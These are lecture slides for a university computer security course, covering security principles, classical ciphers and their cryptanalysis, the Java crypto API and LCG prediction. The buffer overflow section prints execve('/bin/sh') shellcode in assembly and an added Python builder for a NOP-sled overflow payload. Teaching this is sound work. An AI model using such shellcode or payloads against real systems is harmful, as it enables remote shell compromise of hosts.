Lecture Slides

CS4236 Principles & Practice of Computer Security http://www.comp.nus.edu.sg/~cs4236/


Sandeep Kumar
skumar@comp.nus.edu.sg

Lecture Slides p.1

CS4236 Computer Security II
Textbook: Introduction to Cryptography with Coding Theory by Wade Trappe and Lawrence Washington, Chapters 1 to 8, 11 to 13 and 17 (or as much of them as possible). Remaining topics: System & Network Security.
Useful if you are handy with Linux.

Office Hours: Tue 5-6pm in S15#04-08.

Grading policy: marks for tutorials 10%. Each tutorial question will have marks. You must attempt enough questions to get at least 10 marks during the semester.

Caveats
I will not know all the answers. I hope not! It's unlikely that my lecture slides will be ready before the lecture. Mutual discussion is highly encouraged, blind copying is not. Cheating or plagiarism: F in class. Give me regular feedback about the speed and strenuousness of the class. Start looking for a paper to present.

Is Computer Security necessary?


Adapted from [Kan01]. Because a lot of money is handled by computers. Because a lot of important information is stored on and handled by computers: would you want anyone to find your GPA, SAT or GRE scores? How about your credit history or your medical history? There needs to be a mechanism to control the sharing of information. Because society is increasingly dependent on the correct operation of computers. See zdnet.

Examples of Security Problems


Adapted from [Kan01]. The Internet Worm, c. 1988 (buffer overflow): spread over the Internet to many sites; around 6000 sites were shut down to get rid of it. Virus attacks. Denial of service attacks: flooding web servers with an enormous number of requests; flooding the networks en route to the target; exploiting the target's TCP state machine (SYN flooding). See Christoph Schuba's synkill paper.

Examples of Denial of Service


[Figure 1: bandwidth exhaustion. The attacker sends heavy spoofed traffic across the bottleneck link in front of the Yahoo web server, so you cannot get through.]

[Figure 2: SYN flood. The attacker sends TCP SYNs; the target allocates connection state for each one, replies SYN+ACK, and then waits... and waits... for a final ACK that never comes.]

Traditional elements of Information Security - goals in [P96]

Confidentiality [they want your data]. Assets of a computing system are accessible only to authorized parties. Includes reading, printing, or even testing for the existence of an object. Breach: interception.

Integrity. Assets can be modified only by authorized parties. In security, usually distinct from structural integrity (well-formedness). Breach: modification, fabrication.

Availability [they want your bandwidth, CPU, disk]. Assets are accessible to authorized parties. Breach: interruption.

Why is security hard?


Adapted from [Kan01]. Tradeoff between convenience and security, or performance and security. Wily human opponents seek to outwit us. Must assume that the opponent will attack the weakest point. Must get everything right: any mistake is an opportunity for the opponent. Bug-free software?

Design Principles for Secure Systems


From Saltzer and Schroeder [SS75]. Economy of [protection] mechanism: keep the design as simple and small as possible. Fail-safe defaults: base access decisions on permission rather than exclusion. Complete mediation: every access to every object must be checked for authorization. Open design: the mechanism must not depend on the ignorance of attackers; security through obscurity is not security.

Design Principles for Secure Systems. . .

Separation of privilege: two locks are better than one! Least privilege: operate using the least privileges necessary to complete the job. Least common mechanism: minimize the amount of mechanism common to more than one user and depended on by all users. Psychological acceptability: the human interface should be easy to use, so that users apply the protection mechanisms correctly and routinely.

Design Principles for Secure Systems. . .

Lessons from Blaine Burnham. Hear his keynote address at Usenix 2000 here.

Security is not an add-on: "let's build it (get it to run) and add security later on" does not work. Assurance matters. It takes a secret to keep a secret, i.e., good key management is really hard. There are no silver bullets. Security is a system property: composing components, some of which purport to be secure, may not result in a secure system.

Buffer Overflow: Attack of the Decade

Adapted from [Bon] and [CWP+99]. Extremely common bug. 1997: 16/28 CERT advisories. 1998: 9/13 CERT advisories. 1999: 6/12 CERT advisories. Often leads to total compromise of the host. Requires expertise and patience (until someone posts an exploit). CERT statistics can be found here.

Buffer Overflow Mechanism

Two steps: inject suitable code into the program's address space; get the program to jump to that code, with suitable parameters loaded into registers and memory.

Injecting code on Activation Record


Suppose a web server contains the function:

    void func(char *str) {
        char buf[128];        /* fixed-size buffer on the stack; 128 follows from the 136-byte example below */
        strcpy(buf, str);     /* no length check: a str longer than 128 bytes runs past buf */
        /* ... use buf ... */
    }

Injecting code on Activation Record


When the function is invoked, the stack looks like (lower addresses at the top):

    lower address
      buf[0..n]          <- callee constructed; strcpy fills upward from here
      saved frame ptr    <- %ebp
      return address     <- %ebp+4
      str                <- %ebp+8, first argument
    higher address       <- caller constructed

%ebp = frame pointer. %esp = stack pointer. %ebp+4 = return address. %ebp+8 = first argument to the function. The caller pushes the arguments in reverse order; the callee creates the frame linkage. Because buf is filled towards higher addresses, a strcpy that overflows buf overwrites the saved frame pointer and then the return address.

Injecting code on Activation Record


What if str is 136 bytes? After strcpy, the 128 bytes of buf, the 4-byte saved frame pointer and the 4-byte return address have all been overwritten with the contents of str:

    buf (128 bytes) | frame ptr (4) | ret addr (4) | str

The basic problem is that strcpy doesn't do range checking.

Stack Smashing Attack


What if the buffer overflow results in the following stack state:

    buf:        [ P = code that calls execve("/bin/sh", argv, envp), properly constructed! ]
    frame ptr:  (irrelevant)
    ret addr:   the address of P (somewhere inside buf)

See the Aleph One article for a step-by-step description.

Constructing call to execve


%eax contains the syscall number, 11 for execve. %ebx contains the 1st argument to the syscall, a pointer to the string "/bin/sh\0". %ecx contains the 2nd argument (argv), a pointer to the first element of an array of (char *)s whose last element is NULL; here argv = ["/bin/sh", NULL]. %edx contains the 3rd argument (envp), which also points to an array of pointers that ends in NULL. So what if we had %edx point to a location that contained the NULL pointer (0)? Then envp is an empty environment, and the NULL that terminates argv can double as it.

Constructing call to execve. . .


So, if the string is placed at address x, the data looks like this (byte offsets):

    x      "/bin/sh\0"   8 bytes, x .. x+7         <- %ebx = x
    x+8    x             argv[0], the address of the string
    x+12   0             argv[1] = NULL, also the whole of envp

    %ecx = x+8   (the 2-element array argv)
    %edx = x+12  (the 1-element array envp, just the NULL)

We can determine x dynamically: the code finds its own address at run time, so it need not know in advance where on the stack it will land.

Constructing overow buffer


The overflow buffer (the Aleph One shellcode, with the slide's annotations as comments):

    noop                                  # land anywhere in here:
    noop                                  # a run of no-ops so the return address need not be exact
    ...
        jmp   offset-to-call              # jump forward to the call below
    popl:
        popl  %esi                        # %esi now contains the address of "/bin/sh"
        movl  %esi, array-offset(%esi)    # save the address of /bin/sh here (argv[0])
        movb  $0x0, nullbyteoffset(%esi)  # terminate /bin/sh with \0
        movl  $0x0, null-offset(%esi)     # argv[1] = NULL; memory now holds "/bin/sh\0", addr, NULL
        movl  $0xb, %eax                  # 11 for execve
        movl  %esi, %ebx                  # reg b = "/bin/sh"
        leal  array-offset(%esi), %ecx    # reg c = [addr of "/bin/sh\0", NULL]
        leal  null-offset(%esi), %edx     # reg d = NULL
        int   $0x80                       # trap to kernel
        movl  $0x1, %eax                  # exit(0) if execve failed
        movl  $0x0, %ebx
        int   $0x80
    call:
        call  offset-to-popl              # pushes the address of the string below (saves addr of /bin/sh on the stack)
        "/bin/sh"                         # not NUL-terminated in the payload, else strcpy may stop here

Stack Smashing Attack


When func() returns, /bin/sh will read and write file descriptors 0 and 1. These are often redirected to read from and write to a socket. The attack code runs on the stack. Unsafe libc calls: strcpy, strcat, gets: no range checking.

Exploiting buffer overflows

If the web server calls func() with the given URL, then an attacker can create a 200-byte URL to obtain a shell on the web server! Some complications: the program P shouldn't contain the \0 character (strcpy stops at the first NUL). The overflow shouldn't crash the program before func() returns. Recent buffer overflows of this type: overflow in the MIME type field in MS Outlook; overflow in ISAPI in IIS.
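As an added example (not from the slides), here is the payload layout for the overflow above written the way an exploit author would script it. The buffer size 128 and the 4-byte saved frame pointer and return address follow the slides' 136-byte picture; the shellcode bytes and the return address 0xbffff6a0 are constructed placeholders, not a working exploit.

```python
import struct

NOP = b"\x90"  # x86 one-byte no-op: the "land anywhere in here" sled


def build_payload(buf_size, shellcode, ret_addr, saved_fp_size=4, ret_size=4):
    """Lay out the string handed to strcpy() for a buf_size-byte stack buffer.

    Low address -> high address, matching the slides' frame picture:
        [ NOP sled ][ shellcode ][ filler over saved frame ptr ][ return address ]
    The result is buf_size + saved_fp_size + ret_size bytes long (136 for buf[128]).
    strcpy() stops at the first NUL, so neither the code nor the address may contain one.
    """
    ret = struct.pack("<I", ret_addr)  # little-endian, as a 32-bit x86 stack stores it
    if b"\x00" in ret:
        raise ValueError("return address %#x contains a NUL byte" % ret_addr)
    if b"\x00" in shellcode:
        raise ValueError("shellcode contains a NUL byte")
    sled_len = buf_size - len(shellcode)
    if sled_len < 0:
        raise ValueError("shellcode (%d bytes) does not fit in buf[%d]" % (len(shellcode), buf_size))
    payload = NOP * sled_len + shellcode + b"B" * saved_fp_size + ret
    assert len(payload) == buf_size + saved_fp_size + ret_size
    return payload


def landing_zone(buf_addr, payload):
    """Addresses the overwritten return address may take and still reach the shellcode:
    anywhere from the start of buf to the end of the NOP sled."""
    sled_len = len(payload) - len(payload.lstrip(NOP))
    return buf_addr, buf_addr + sled_len


# Constructed placeholder "shellcode": 45 int3 instructions, NUL-free, not the execve stub above.
PLACEHOLDER_SHELLCODE = b"\xcc" * 45
```

The NUL checks are the two complications the slide lists; a return address such as 0x08049000 (which contains a zero byte) is rejected, because strcpy would truncate the payload before the overwrite reaches the saved return address.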

Java Crypto API


Based on JDK 1.5.

Some key-related classes in Java

java.security.Key: the top-level interface for all opaque keys (symmetric and asymmetric). String getAlgorithm(): the name of the key's algorithm. byte[] getEncoded(): the raw bytes of the key in its primary encoding format. String getFormat(): the format of the encoded key, e.g., PKCS#8, X.509.

Creating keys for symmetric ciphers


javax.crypto.SecretKey is a sub-interface of Key and represents a secret (symmetric) key. Class SecretKeySpec implements SecretKey. To generate a DES key for the byte sequence 0x0102030405060708, use:

    byte[] key = new byte[] {0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08};
    SecretKey desKey = new SecretKeySpec(key, "DES");

KeySpec

java.security.spec.KeySpec: an interface that denotes the transparent (user-visible) representation of the key material that constitutes a key. Contains no methods or constants. Class SecretKeySpec implements both KeySpec and SecretKey (more directly relevant for us). SecretKey is an interface that extends Key, so it can be used with Cipher. The two lines above build such a key directly from the raw bytes. Note that DES has only a 56-bit key and is brute-forceable; it serves here as an illustration of the API, not as a recommendation.

Using IVs with symmetric ciphers


javax.crypto.spec.IvParameterSpec: a class that specifies an IV. Implements AlgorithmParameterSpec. public IvParameterSpec(byte[] iv): for example, create an eight-byte array (one DES block), initialize it with the IV and construct an IvParameterSpec from it. Can be passed to Cipher.init(...) because it is an AlgorithmParameterSpec. The IV need not be secret, but for CBC it must be unpredictable and must never be reused with the same key.

The Cipher class


javax.crypto.Cipher: a class that provides the functionality of encryption and decryption (both symmetric and asymmetric).

public static Cipher getInstance(String tx), for example Cipher.getInstance("DES/CBC/PKCS5Padding").

Tx, or transformation: algorithm/mode/padding.

A cipher can be initialized with cipher.init(Cipher.ENCRYPT_MODE, key, ivSpec), where ivSpec is an AlgorithmParameterSpec such as an IvParameterSpec, or with cipher.init(Cipher.ENCRYPT_MODE, key). The second form generates its own IV, which can be retrieved with cipher.getIV() and must be sent along with the ciphertext so that the receiver can decrypt.

Cipher. . .
To encrypt a byte stream, use

    byte[] encryptedBytes = cipher.update(buffer, 0, b_read);

The length of the returned bytes need not equal the length of the argument bytes: no such semantics are specified in the Java API, and a block cipher must collect a block's worth of data before it can produce output, so update may return an empty array.

To end encryption, use

    byte[] encryptedBytes = cipher.doFinal();

All outstanding bytes are returned. Padding is applied if specified in the transformation.

Using Hashes

To calculate the MD5 checksum of a byte stream, use java.security.MessageDigest: obtain an instance with MessageDigest.getInstance("MD5"), feed the stream through update(...), and finish with digest(), which returns the 16-byte hash. Note that MD5 is no longer collision resistant: it is adequate as a checksum against accidental corruption, but not as an integrity mechanism against an adversary.

X.500 Names

Loosely, an X.500 name is hierarchical and consists of the following attributes:

    Country (C):              SG
    State or Province (ST):   Singapore
    Locality (L):             Clementi
    Organization (O):         National University of Singapore
    Organizational Unit (OU): School of Computing
    Common Name (CN):         Sandeep Kumar
    Email Address:            skumar@comp.nus.edu.sg

Base 64 encoding

Look here for more information. There must be other references. Encode a sequence of octets using the characters [A-Za-z0-9+/] to represent 6 bits each. Use the character = for trailing padding. Every 6 bits of input are represented as one printable character of 8 bits, so three input octets become four characters: 33% expansion. Ex: 0x1F is Hw==. Is it? Yes: 0x1F = 00011111; the first six bits 000111 = 7 = H, the remaining two bits padded with zeros give 110000 = 48 = w, and the two octets missing from the 3-octet group are signalled by ==.
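An added example (not part of the slides): a base64 encoder and decoder written from the rule above, so the Hw== question can be checked mechanically. The decoder is strict by default and rejects misplaced padding and non-zero padding bits; this matters in practice because lenient decoders accept several encodings of the same bytes, which lets an attacker bypass checks that compare encoded strings.

```python
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def b64encode(data: bytes) -> str:
    """Three octets (24 bits) become four characters of 6 bits each; a 1- or 2-octet
    tail is zero-filled and the missing octets are signalled with '==' or '='."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        n = int.from_bytes(chunk.ljust(3, b"\x00"), "big")     # zero-fill to 24 bits
        chars = [ALPHABET[(n >> shift) & 0x3F] for shift in (18, 12, 6, 0)]
        pad = 3 - len(chunk)                                    # 0, 1 or 2 missing octets
        out.append("".join(chars[:4 - pad]) + "=" * pad)
    return "".join(out)


def b64decode(text: str, strict: bool = True) -> bytes:
    """Inverse of b64encode. With strict=True, reject padding in the wrong place and
    non-zero padding bits, so that each byte string has exactly one accepted encoding."""
    if len(text) % 4:
        raise ValueError("length must be a multiple of 4")
    out = bytearray()
    for i in range(0, len(text), 4):
        quad = text[i:i + 4]
        pad = quad.count("=")
        if pad > 2 or (pad and not quad.endswith("=" * pad)) or (pad and i + 4 != len(text)):
            raise ValueError("misplaced padding in %r" % quad)
        n = 0
        for ch in quad[:4 - pad]:
            n = (n << 6) | ALPHABET.index(ch)                   # ValueError on a foreign char
        if strict and pad and n & ((1 << (2 * pad)) - 1):
            raise ValueError("non-zero padding bits in %r" % quad)
        n <<= 6 * pad                                           # back to a 24-bit group
        out += n.to_bytes(3, "big")[:3 - pad]
    return bytes(out)


def expansion(data: bytes) -> float:
    """Encoded length over raw length: 4/3 for whole groups, i.e. the 33% on the slide."""
    return len(b64encode(data)) / len(data)
```

"Hx==" decodes to the same byte 0x1F as "Hw==" under a lenient decoder (the low four bits of x are simply dropped); the strict decoder refuses it.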

Classical Ciphers
Pre DES


Shannon's model of a secrecy system

Diagram as in [Sha49]: the plaintext source at the sender produces P; the encrypter computes C from P and the key K; C travels over the channel to the decrypter, which recovers P from C and K and passes it to the destination at the receiver. The key source delivers K to both ends over a separate secure channel. The enemy cryptanalyst observes C on the channel.

Shannon's model. . .
Encryption encodes a message so its meaning is not obvious. For symmetric encryption, P = D(K, E(K, P)). For asymmetric encryption, P = D(K_D, E(K_E, P)), with a public encryption key K_E and a private decryption key K_D. The security of a cryptosystem should rest entirely in the secrecy of the key, and not in the secrecy of the algorithm (Kerckhoffs).

Types of attacks
Cryptographers design their algorithms to resist the following, increasingly aggressive, attacks [Susan Landau]:

Ciphertext-only: the adversary has access only to encrypted communications.
Known-plaintext: the adversary has some (plaintext, ciphertext) pairs.
Chosen-text: the adversary chooses the plaintext to be encrypted (chosen plaintext); or the ciphertext to be decrypted (chosen ciphertext); or the plaintext to be encrypted depending on the ciphertext received from previous requests (adaptive chosen plaintext).

Monoalphabetic Substitution Cipher


A shift cipher, e.g., Caesar's cipher, is a very simple permutation; rot13 is another example. An example is shift by 3:

    plaintext:  a b c d e f g h i j k l m n o p q r s t u v w x y z
    ciphertext: d e f g h i j k l m n o p q r s t u v w x y z a b c

So the secret message "attack at dawn" is encrypted as

    a t t a c k   a t   d a w n
    d w w d f n   d w   g d z q

Keyspace: 25. Can be broken using ciphertext only (try all 25 shifts).

Affine Ciphers
A specific way to construct a permutation. Choose two integers α and β with gcd(α, 26) = 1, and consider the ciphering function

    y = αx + β (mod 26)

Keyspace: there are 12 choices of α (1, 3, 5, 7, 9, 11, 15, 17, 19, 21, 23, 25) and 26 of β, so 12 × 26 = 312 keys. Easy to break with a ciphertext-only attack.

Monoalphabetic substitution cipher

In general, the secret key is a table, a permutation that maps each symbol of PT onto a symbol of CT, e.g.,

    plaintext:  a b c d e f g h i j k l m n o p q r s t u v w x y z
    ciphertext: p a n d o r s b x c e f g h i j k l m q t u v w y z

Keyspace: 26! permutations, about 4 × 10^26. At 1 decrypt/s it would take about 10^19 years to cycle through them all. Constructing an easy-to-remember permutation is simple with a keyword, such as pandorasbox above: write the keyword with repeated letters dropped, then the remaining letters of the alphabet in order.

Monoalphabetic substitution cipher. . .

Unfortunately, one can use the frequency of English letters

    e       t       a       o       i       n
    12.5%   9.25%   8.04%   7.60%   7.26%   7.09%

and of letter pairs to break this cipher using a ciphertext-only attack. Most common digram: th; most common trigram: the.

Example of mono cryptanalysis


Example from [Kip99]:
ETNAN XFWN LYK Y RYETNA QF EBWKXF LTX KYQP ETQK YPHQWN QK RXA DXB KXF DXB PXFE LYKT DXBAKNMR LNMM KX DXBA RNNE KCNMM MQUN TNMM QR QF VNP LQET Y ZQAM UNNI DXBA KTXNK XF Set N = E as N is the most frequent letter; now search for the, 3 times N is preceded by T , set T = H , 2 times T N is preceded by E , set E = T . Notice the lone Y , set Y = A. The rst word could be there, so set A = R. If A = R, then R = R, maybe R = F . Try http://localhost/info/cgi-bin/mono.cgi for a demo.

Unfortunately, same letters in plaintext encrypt to same letters in ciphertext.

Classical Ciphers p.41

Vigenère Cipher
Invented circa 1520. Applied arithmetic to ciphers.

    plaintext:  w h a t a n i c e d a y t o d a y
    key:        c r y p t o c r y p t o c r y p t
    ciphertext: y y y i t b . . . . . . . . . . .

Use the Vigenère tableau to encrypt or decrypt messages. It's like n instances of Caesar's cipher, or addition modulo 26 where a = 0, ..., z = 25: c_i = (p_i + k_{i mod n}) mod 26. Keyspace: 26^n, where n is the number of symbols in the key. It evens out the frequency disparity of the plaintext alphabet.

Vigenère Cipher. . .
Vigenère's tableau (part of it): row k is the alphabet shifted by k positions, and the ciphertext letter is found at (row = key letter, column = plaintext letter).

    a | a b c d e f g h i j k l m n o p q r s t u v w x y z
    b | b c d e f g h i j k l m n o p q r s t u v w x y z a
    c | c d e f g h i j k l m n o p q r s t u v w x y z a b
    d | d e f g h i j k l m n o p q r s t u v w x y z a b c
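An added example, not from the slides, covering both the shift cipher and the Vigenère cipher above: the Vigenère function is the "addition modulo 26" form, the shift cipher is the one-letter-key special case, and tableau_row/tableau_lookup reproduce the table form. Non-letters are passed through so that "attack at dawn" keeps its spaces as on the slide.

```python
ALPHA = "abcdefghijklmnopqrstuvwxyz"


def _key_shifts(key):
    shifts = [ALPHA.index(ch) for ch in key.lower() if ch in ALPHA]
    if not shifts:
        raise ValueError("key needs at least one letter")
    return shifts


def vigenere(text, key, decrypt=False):
    """c_i = (p_i + k_{i mod n}) mod 26 with a = 0 ... z = 25.
    Non-letters are passed through unchanged and do not consume a key letter."""
    shifts = _key_shifts(key)
    out, j = [], 0
    for ch in text.lower():
        if ch not in ALPHA:
            out.append(ch)
            continue
        k = shifts[j % len(shifts)]
        j += 1
        if decrypt:
            k = -k
        out.append(ALPHA[(ALPHA.index(ch) + k) % 26])
    return "".join(out)


def shift_cipher(text, k, decrypt=False):
    """Caesar: a Vigenère with a one-letter key. Keyspace 25 (26 with the identity)."""
    return vigenere(text, ALPHA[k % 26], decrypt)


def tableau_row(k):
    """Row k of the Vigenère tableau (the alphabet rotated left by k)."""
    return ALPHA[k:] + ALPHA[:k]


def tableau_lookup(key_letter, plain_letter):
    """Encrypt one letter by table lookup: row = key letter, column = plaintext letter."""
    return tableau_row(ALPHA.index(key_letter))[ALPHA.index(plain_letter)]
```

Decryption is the same walk with the key shifts negated, which is why the Vigenère tableau serves both directions.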

Cryptanalysis of the Vigenère Cipher. . .

Easy to break [Fri84, pg. 17], [Sta99, pg. 40], [P96, pg. 35]. First find the key length. Kasiski: identical sequences of plaintext at distances that are integral multiples of the keyword length produce identical ciphertext sequences, so measure the distances between repeated ciphertext sequences and look for common factors. English uses several endings and beginnings disproportionately often, and words such as "of", "and", "to" etc. appear with high frequency, so such repeats are plentiful.

Cryptanalysis of the Vigenère Cipher. . .

Divide the ciphertext into key-length-sized blocks. All elements in the same relative position within each block were encrypted with the same key letter and so form a monoalphabetic (shift) cipher. Break each position of the block separately with frequency analysis. A ciphertext-only attack.

Cryptanalysis of the Vigenère Cipher. . .

Use the Index of Coincidence. It is defined as the probability that two randomly selected letters in a ciphertext are identical:

    IC = Σ_i n_i (n_i − 1) / (n (n − 1))

where n_i is the number of occurrences of symbol i (say a ... z) and n is the total number of letters.

Cryptanalysis of the Vigenère Cipher. . .

See [TW02, Section 2.3] for details. To compute |key|: what if we computed IC from the ciphertext c_1 ... c_n by counting coincidences with the shifted ciphertext c_k ... c_n c_1 ... c_{k−1}? If k = |key|, then c_1 and c_k were shifted by the same amount, as were c_2 and c_{k+1}, etc. So we should find the IC to be close to that of English, because a monoalphabetic transformation doesn't change the IC.

Index of Coincidence. . .
Another interpretation of IC is that it is a measure of the variation of the frequencies in a distribution from the uniform [P96, Section 2.3]. If α represents a plaintext symbol and p_α = n_α / n its relative frequency, then Σ_α p_α = 1. Let's find the variation of a given distribution from a flat distribution p_α = 1/|Σ| = 1/26:

    var = Σ_{α=a}^{z} (p_α − 1/26)^2
        = Σ_α p_α^2 − (2/26) Σ_α p_α + 26 · (1/26)^2
        = Σ_α p_α^2 − 1/26

Now IC = Σ_α n_α (n_α − 1) / (n (n − 1)) ≈ Σ_α p_α^2 for large n, so

    IC ≈ var + 1/26, i.e., IC = var + const!

Cryptanalysis of the Vigenère Cipher. . .

Example: consider the ciphertext

    WSPGM VESQT CXHCX JXTJI TWSGR JX HHEHM IMMKW HSMGX RIRVE HIRGK CMTGP
    BMTKW WMNIA XRTAX PVDNI NROVX CSTVL XPLVY WETUS HWOHL WISCQ TGOPZ GROWX
    BITJM DAIVX TXHKR XGTQM LILNF CKMCO JVNUS

Cryptanalysis of the Vigenère Cipher. . .

The counts of the various letters are:

    a 3   b 2   c 7   d 2   e 4   f 1   g 8   h 9   i 10  j 5   k 5   l 5   m 11
    n 5   o 5   p 5   q 3   r 8   s 8   t 12  u 2   v 8   w 9   x 13  y 1   z 1

The total number of letters is n = 152. Thus

    IC = Σ_{i=0}^{25} n_i (n_i − 1) / (n (n − 1))
       = (3·2 + 2·1 + 7·6 + 2·1 + ... + 1·0 + 1·0) / (152 · 151)
       = 1048 / 22952
       = .0457

Index of Coincidence. . .
IC is a predictor of key length when the key length is small. It cannot discriminate well between large key lengths: for a long key the ciphertext looks uniform and IC → .038 = 1/26, which is what we'd expect of random letters.

    key length:  1     2     3     4     5     10    large
    IC:          .068  .052  .047  .044  .044  .041  .038
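An added example (not from the slides) that computes the Index of Coincidence as defined above and applies the shifted-ciphertext idea to estimate the key length. CIPHERTEXT is the slides' own example; the 0.9 tolerance in estimate_key_length and the 0.065/0.038 reference values are my choices, not the slides'.

```python
from collections import Counter

ALPHA = "abcdefghijklmnopqrstuvwxyz"

# The ciphertext from the slides (spaces are ignored).
CIPHERTEXT = ("WSPGM VESQT CXHCX JXTJI TWSGR JX HHEHM IMMKW HSMGX RIRVE HIRGK CMTGP "
              "BMTKW WMNIA XRTAX PVDNI NROVX CSTVL XPLVY WETUS HWOHL WISCQ TGOPZ GROWX "
              "BITJM DAIVX TXHKR XGTQM LILNF CKMCO JVNUS")


def letters(text):
    return [c for c in text.lower() if c in ALPHA]


def index_of_coincidence(text):
    """IC = sum_i n_i (n_i - 1) / (n (n - 1)): probability that two letters drawn
    without replacement are equal. About 0.065 for English, 1/26 = 0.038 for random text."""
    ls = letters(text)
    n = len(ls)
    if n < 2:
        raise ValueError("need at least two letters")
    counts = Counter(ls)
    return sum(c * (c - 1) for c in counts.values()) / (n * (n - 1))


def shifted_coincidence(text, k):
    """Fraction of positions i with c_i == c_{i+k} (cyclically). When k is a multiple of
    the key length both letters were shifted by the same key letter, so the rate is the
    plaintext's (~0.065) rather than the random 1/26."""
    ls = letters(text)
    n = len(ls)
    return sum(ls[i] == ls[(i + k) % n] for i in range(n)) / n


def estimate_key_length(text, max_len=20):
    """Smallest shift whose coincidence rate is at (or within 10% of) the maximum:
    multiples of the true key length all score high, so take the smallest of them."""
    scores = {k: shifted_coincidence(text, k) for k in range(1, max_len + 1)}
    best = max(scores.values())
    return min(k for k, s in scores.items() if s >= 0.9 * best)


def column_ics(text, keylen):
    """IC of every residue class mod keylen; each column is a monoalphabetic cipher, so
    with the right keylen every column's IC comes back up towards the plaintext's."""
    ls = letters(text)
    return [index_of_coincidence("".join(ls[j::keylen])) for j in range(keylen)]
```

column_ics is the check for a candidate key length from the earlier slide: split into columns and confirm that each column's IC is English-like, then break each column as a shift cipher.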

Permutation Cipher
Columnar transposition. Consider the plaintext howareyoutoday. Write this as two blocks of seven characters each:

    h o w a r e y
    o u t o d a y

The ciphertext is the plaintext read in column order, so the ciphertext is hoouwtaordeayy. Same letter frequencies as the original text. Can be broken using a form of frequency analysis. Can be broken with a KPA.

Permutation Cipher. . .
It's a permutation on the positions of the PT symbols in the corresponding CT. For example, HELLOWORD might be transformed into LWHOEROLD. An example permutation (which must be a bijection on the positions 1 to 9) is

    π = ( 1 2 3 4 5 6 7 8 9 )
        ( 3 5 1 4 2 7 9 6 8 )

Playfair cipher
1854, by Sir Charles Wheatstone. A 5 × 5 matrix of letters constructed using a keyword [Sta99], here MONARCHY:

    M O N A   R
    C H Y B   D
    E F G I/J K
    L P Q S   T
    U V W X   Z

In general, insert a filler letter such as x between successive identical letters to avoid needing to encrypt pairs such as tt. Plaintext is encrypted two letters at a time: letters in the same row are replaced by the letters to their right, letters in the same column by the letters below them, and otherwise each letter is replaced by the letter in its own row and the other letter's column.

    ATTACKATDAWN -> RSSRDERSBRNY

Playfair Cipher. . .
Used by the British Army in WW I. Frequency analysis is more difficult, but the cipher is still susceptible to digram frequency analysis: the distribution is flatter than the plaintext's, but there is nevertheless plenty of structure. Both digrams "re" and "er" are common, so if the ciphertext pairs IG and GI are common, e, i, r, g probably form the corners of a rectangle, such as

    e . i        e . g
    . . .   or   . . .
    g . r        i . r

The last few rows of the matrix are predictable (the unused letters in alphabetical order). Each plaintext letter encrypts to one of only five ciphertext letters: h → {c, y, b, d, f} in the previous example.

Hill Cipher
Invented by Lester Hill in 1929. A block cipher: a ciphertext letter depends on multiple plaintext letters!

    C = K P (mod 26),  0 ≤ k_ij < 26

det(K) must be relatively prime to n (here 26) for K to be invertible mod n. For a block size of 8, the keyspace is about 26^64 > 2 × 10^90. Strong against a ciphertext-only attack, but easily broken under a known-plaintext attack: given enough (P, C) pairs, solve the linear system for K.

Perfect Substitution Cipher


Use an infinite non-repeating sequence as key. Confounds both Kasiski and the Index of Coincidence. This is the one-time pad. However, there is a need for synchronization between sender and receiver, and a need for an unlimited number of keys: long random number sequences. Can be used at the bit level [Gilbert Vernam, 1918]. However, statistical pseudorandomness ≠ unpredictability. Long sequences from books, or digits from the phone book, might have some non-uniformity (and are hardly secret).

Linear Congruential Generator


A Linear Congruential Generator is of the form

    r_{i+1} = (a · r_i + b) mod n

where a, b, n are constants. It's totally linear! For example, given the "random" sequence 958833456, 396607904, 2147285887 for n = 2^31 − 1 = 2147483647, we have the equations

    396607904  = a · 958833456 + b  (mod 2147483647)
    2147285887 = a · 396607904 + b  (mod 2147483647)

Subtracting,

    396805664 = a · 562225552  (mod 2147483647)
    a = 16807

and then b = 0: this is the well-known minimal-standard generator, and every future output is now predictable.
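An added example (not part of the slides) that carries the recovery above through in code: from three consecutive outputs and a known prime modulus it solves for a and b exactly as the two equations are subtracted on the slide, then predicts the next output. It assumes n is known and prime (so the difference r1 − r0 is invertible); recovering an unknown modulus needs more outputs and is not shown.

```python
N = 2**31 - 1                                   # the slide's modulus (a prime)
OUTPUTS = [958833456, 396607904, 2147285887]    # three consecutive observed outputs


def lcg_next(r, a, b, n):
    return (a * r + b) % n


def recover_lcg(r0, r1, r2, n):
    """Solve r1 = a r0 + b and r2 = a r1 + b (mod n) for (a, b).
    Subtracting gives r2 - r1 = a (r1 - r0); with n prime the difference is
    invertible unless r1 == r0."""
    d = (r1 - r0) % n
    if d == 0:
        raise ValueError("r1 == r0: the generator is stuck, cannot isolate a")
    a = (r2 - r1) * pow(d, -1, n) % n
    b = (r1 - a * r0) % n
    return a, b


def predict(outputs, n, count):
    """Recover the state from the first three outputs and extend the sequence by count values."""
    a, b = recover_lcg(*outputs[:3], n)
    seq = list(outputs)
    for _ in range(count):
        seq.append(lcg_next(seq[-1], a, b, n))
    return seq
```

This is the whole point of the slide: an LCG is fine for simulations but its outputs must never be used as keys, IVs or session tokens, because three observed values hand an attacker the entire future stream.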

Vernam Cipher
Gilbert Vernam, 1918. Choose a keyword as long as the plaintext with no statistical relationship to it [Sta99, pg. 40]. Works on bits:

    c_i = p_i ⊕ k_i

One Time Pad (Joseph Mauborgne): use a random key as long as the message, but only once!

Rotor Machines

Three rotors plus a reector. After every letter was encrypted, the rotor turned like an odometer. Each letter encrypted by effectively a new mono alphabetic substitution cipher.


Knapsack Encryption

Given a set of integers a_1, a_2, ..., a_n, find whether a subset of them adds up to a given integer t. For example, for the set

    A = {4, 7, 33, 1, 12, 78, 11, 291}

is there a subset that adds up to 17? To 129? To encrypt text, say NUS IS GREAT, use the ASCII bit sequence of each character to select the numbers of the knapsack to add. So N = 0x4E = 01001110 = 7 + 12 + 78 + 11 = 108. U = 0x55 = 01010101 = 7 + 1 + 78 + 291 = 377 ... and so on.

Knapsack Encryption. . .
Alternatively, the knapsack can have 16 numbers and you can encrypt two characters at a time. Suppose that

    A = {4, 7, 33, 1, 12, 78, 11, 291, 101, 29, 1101, 561, 487, 9826, 791, 893}

Then you encrypt the message as NU SI SG RE AT. The difficulty is that solving the general knapsack is as difficult for the recipient as it is for the enemy.

Merkle-Hellman Knapsack Encryption

Make the problem difficult for the enemy but easy for the recipient! A superincreasing knapsack is one in which the integers in the knapsack form a superincreasing sequence, that is, each element exceeds the sum of all the elements before it:

